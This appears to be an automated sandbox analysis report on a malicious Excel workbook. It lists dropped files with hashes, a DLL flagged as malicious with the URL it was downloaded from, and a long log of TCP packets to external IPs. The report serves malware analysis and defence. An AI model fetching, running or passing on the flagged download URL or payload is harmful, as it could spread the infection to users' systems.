SHA-512:	15D491E6808891392A1F26CB0DC568C7E8C204029F68B8BFADBEA1A735DBA9D3A86BA341FBFB2DF6BF9619C5C53BF81A77D8B0B34E6ADA3F2707FC96330D5940
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D28724DB-6B49-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5680702315474737
Encrypted:	false
SSDEEP:	48:Iw+hGcprHGwpakJhG4pQSdGrapbSOrGQpBeGHHpcAsTGUpG:r+XZRQcz6OBSOFjt2AkA
MD5:	25487A3F830AB47E33C53E7A483219DF
SHA1:	3C370BE7D4101FEC94D3274E5713254C9B3ACCCC
SHA-256:	2B24C29AC46623096123DE95A310F0C6BA2424BB07B93C9E7E38EE4F38BF336D
SHA-512:	AD81FD30AF4EB42136ED9205ADD26BE42CDD5E809EC7D954A3BD84EEFEFAF162218EC44ABFAA8C22F5E66503CBCCA81FB52427D9A39D3C4DBA1C42BF53C58189
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8F740160-CB42-41BF-ADD2-59ED776F89FF Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	133103
Entropy (8bit):	5.376512326572846
Encrypted:	false
SSDEEP:	1536:ucQceNqaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLLPEh:OrQ9DQW+zBX84
MD5:	E74EE03EC77033FFBC44F9D0E3150C17
SHA1:	2AEB424ABD664F8C29D3632C086CBA4B0C0AEA1E
SHA-256:	64430C437AA94991F105822F91761FC5D002C6EC4E880D4DF8F0A46D4C8DFE9B
SHA-512:	E2DD772D1BC7CBC4F5F82797BD9C8F2B5F12D3752D8F3D2F8179C47454512D5FB0ACB7913B9497836252ACDB775DFA300655B65B47032073E5ACB6ACF85428B5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-09T17:41:40">.. Build: 16.0.13802.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\55CDA90A.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 1200 x 800, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33923
Entropy (8bit):	7.68545544084692
Encrypted:	false
SSDEEP:	384:/bJTVSjT1t05IO4gCdzJ22tjSKKSYkIfE8taQO30pTVuClvHzwCFGP4yQaf5dMlU:7w1C5GjhjjRgkNOLOkyPM4rM+H
MD5:	4A3975F458CA57A2E7A2139AD0B1F6AC
SHA1:	2D39BBE49EE7AA36EE363BF8113543A8CFD45FF5
SHA-256:	D1A22C76ABC644665B92855CD734250DD3B3E26E5CA40A9B1D5F4AD3367F9B69
SHA-512:	D12F9A21000241BC04CAD957667993C2AC12F5A9B2DABA5F64D5BC1023C16FBB5E43FBF9B6A1A8B8D7444AF7C26BD2F377CEC9E7A3E2F8DE9D73F3A979EBE044
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR....... .....3.......pHYs.................sRGB.........gAMA......a.....IDATx.....]u}7....@P\@Il...D..M...6..c..Z.....b+...O..>]..h..U..V...m5Ikk*.H..b.K.j.......?.3s.3w.r.......d..{.{f.g....m...{4....@.vO.....1......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`......=.m}q..4H...~.=.....3}..A...nO...7&.....F.......i..v..i.=...4....r`.!....Y.`.....5......Y.`.....5......Ys.B....z\|:~..........{.{../..[._l.......I.EV.~..i..?!m.......~/..E..~.Mi.A...C...X...L6...w.O.(........[>..n.`...>.y......~.].~M..m....q{.>....xv....}4...k...\|$1}^....~......L'.....'>5.......s.~...3_\|r.i?.......>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	292864
Entropy (8bit):	6.716033334198825
Encrypted:	false
SSDEEP:	3072:7m3Ztpl9Lpeyx09/34JOs7npgMJTVyMKN71TzjmDExUQQsP9+izoQiQ8QWQtQuQc:6pR+cTnylZPjmJQQsVj/Tmcss+l/
MD5:	B6F4155A945D241F4E5228571C2AB39C
SHA1:	2F4C7FD261CCFE3C4E3DE686A056251035DE489E
SHA-256:	CE7F1D11DD7BEC82B96DC9472AB1D36CBA5E1C99F0480DBA6DD60CD3090DE320
SHA-512:	5E973F8C2168CBFB3C476703FAD6C5F2E90E65C39C7CB6828F759437BDE42A1718EEC9F1BC53874326D14C4F778FCE7FA30A48065B2E36618A202921CDA98642
Malicious:	true
Reputation:	low
IE Cache URL:	https://urbandancecity.com/wp-content/cache/stats/5fe/5bc/2200.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.f...f...f...4..f...4..f...4.f.......f...f...f.....f......f...4..f......f..Rich.f..........................PE..L.....T...........!........J...............@...............................p............@.........................PA..C....A..<....@..T....................P..x...pA..8..............................@............@..$............................text...(......................... ..`.rdata.......@......................@..@.data...@....P.......8..............@....rsrc...T....@.......R..............@..@.reloc..x....P... ...X..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2E720000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	76147
Entropy (8bit):	7.741958925688105
Encrypted:	false
SSDEEP:	1536:ech4kJGZj1jky04V4Tbit7iI5DzxbPoOwP8X0oZA+vy:Th4Sqj1I4miRiI5fhoOG+6b
MD5:	2B61B6A837C03211466E67332F663740
SHA1:	F15AE7179ED30FF735DD7E2B289D1E53C570A96E
SHA-256:	456DF6BFF51D037FCF08E77E32A9315E2162C70030F6CE8CD90575028288E4FF
SHA-512:	D96E89F27A1898B3451B04555B7E85DC66D57C4F45581CE0612F509BB514CF99CDDB3DC9BC18ACE995095FE0522AE10D3ED7E554CEA1EEA008CF9A10BF4CFEEA
Malicious:	false
Reputation:	low
Preview:	.]o.0...'.?D...C..c".....J.~......d.-......B#"57.b.y......V... ........B..&..~.......5P...r9..ir.r...6.&m.......Y....#s.5...7.1.`....rk".X..L'?a..U,..x{M.LC.....TM.N..>.Y1..U.sNI."N.>....... ,...S....D.*.%2.[....ohzP.....+3Xh.._.7...K...jS..........o..-.T......E..I.F....T.._i..6l...4O.{.re..2~...E..i.....9N...u .....} ....8. ...n....u.my>../..1....^......y<Bns`I..R.z.}...r.<.......y.....@7_..}..nL.".\|.{.......].......L..3]...w....o.u......<..T]:l.>J...].t......C:...;.i>.M........PK..........!.l4.>....Q.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF206185CB52F6F9D7.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25657
Entropy (8bit):	0.3135785170840025
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwO9lwe9l2R:kBqoxKAuvScS+hfR
MD5:	B40C408BF1C042CC61D461CA11CB65FF
SHA1:	44E8763B9A53CD3535EBC904CB72180BE60F46AC
SHA-256:	01A7246DC1C070145F217EB19AF41FDB477A3B64F67E46EEE878C1572F76C7F6
SHA-512:	A45C01B6DCA983E52C5339C2234E60B9B822E0BA339C4CC44403CF4D949458D03B46369541BC45E64840A8637D51552D925260D04DC4A6B723D659BB24C0B0C1
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEB4D811C683D48A8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12917
Entropy (8bit):	0.39569477813375487
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo69loq9lWdHZHC:kBqoIlTd5i
MD5:	CDC89AAA216BCDA2BF23D81FE673B308
SHA1:	D8EE470B27E5594E45F96F4D7DBF10F327A65BC1
SHA-256:	B60FB7172EF3C0EC2AE5871D1E71A09045EF2893B812D51B56B35F917E963B92
SHA-512:	5CF2F6DD31F40F8E6C46614B7F4826127C785421B64356746D93C35AD99573123C9B1B42054A924BF450C42D7E29562AC02D3CEAB4EB01CC1D95F618264B2C6B
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Attached_File_898318.xlsb Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:	A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.781038613841343
TrID:	Excel Microsoft Office Binary workbook document (47504/1) 49.74% Excel Microsoft Office Open XML Format document (40004/1) 41.89% ZIP compressed archive (8000/1) 8.38%
File name:	Attached_File_898318.xlsb
File size:	100969
MD5:	a8532cadcdc6aa2ca92e78352727bd50
SHA1:	de9a89b9a1ac2778660695a982b9f34641fd3608
SHA256:	8c54fb4a33fef841a472e5c7d92b49c1d589a8af374e510331f72fb5a4189c4a
SHA512:	ac11ab0d7b4534584ef34e7d217f43592298f89f0d6f230fc1ab30471d99aaac1dd5e170f0097d760d9c0d7c51a1f6012b29b3ba2f4a356b2c8587a8de2af261
SSDEEP:	3072:W6GiXh/woPcEMuYM76xbTD3xbqj1I4TpFFEJ/:FGix/bkJMmxP7xbkIGz2J/
File Content Preview:	PK..........!.._\.}...........[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74f0d0d2c6d6d0f4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "Attached_File_898318.xlsb"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2021 18:41:48.577832937 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:41:48.619759083 CET	80	49727	139.162.190.91	192.168.2.6
Feb 9, 2021 18:41:48.620371103 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:41:48.621252060 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:41:48.662097931 CET	80	49727	139.162.190.91	192.168.2.6
Feb 9, 2021 18:41:48.785017967 CET	80	49727	139.162.190.91	192.168.2.6
Feb 9, 2021 18:41:48.786403894 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:41:49.003052950 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.161890030 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.163575888 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.165004015 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.323724985 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.324743986 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.324795961 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.324846983 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.324891090 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.324894905 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.324956894 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.324960947 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.324978113 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.329449892 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.329564095 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.755325079 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.916503906 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:49.916794062 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:49.918332100 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.119045019 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207824945 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207856894 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207871914 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207890987 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207909107 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207927942 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207945108 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207962036 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207973957 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207990885 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.207993984 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.208062887 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.366602898 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366633892 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366651058 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366667986 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366683006 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366702080 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366722107 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366736889 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366754055 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366770029 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366781950 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366791964 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.366797924 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366810083 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366827011 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366858006 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.366882086 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366884947 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.366902113 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366940022 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.366967916 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.366970062 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.366997004 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.367013931 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.367016077 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.367032051 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.367048979 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.367069960 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.367259979 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527359009 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527385950 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527401924 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527419090 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527434111 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527450085 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527466059 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527483940 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527502060 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527517080 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527533054 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527549028 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527564049 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527580023 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527579069 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527595043 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527615070 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527631998 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527647018 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527669907 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527707100 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527723074 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527734995 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527761936 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527779102 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527795076 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527800083 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527829885 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527853012 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527867079 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527903080 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527909994 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527919054 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527956963 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.527956963 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.527978897 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528007984 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528073072 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528090000 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528109074 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528115034 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528126001 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528142929 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528152943 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528160095 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528181076 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528189898 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528206110 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528206110 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528238058 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528264999 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528311968 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528340101 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528354883 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528356075 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528378963 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528393984 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528397083 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528431892 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528496027 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528512955 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.528539896 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.528568029 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688374996 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688401937 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688415051 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688431978 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688448906 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688462019 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688477993 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688494921 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688510895 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688523054 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688535929 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688540936 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688558102 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688574076 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688590050 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688606977 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688613892 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688622952 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688640118 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688658953 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688663960 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688676119 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688692093 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688699961 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688719988 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688747883 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688786030 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688837051 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688844919 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688862085 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688889980 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688903093 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688936949 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688942909 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.688966990 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.688983917 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689001083 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689016104 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689016104 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689038992 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689075947 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689138889 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689156055 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689172029 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689187050 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689196110 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689219952 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689253092 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689286947 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689304113 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689320087 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689330101 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689335108 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689358950 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689397097 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689467907 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689490080 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689531088 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689531088 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689558983 CET	49728	443	192.168.2.6	192.185.16.102
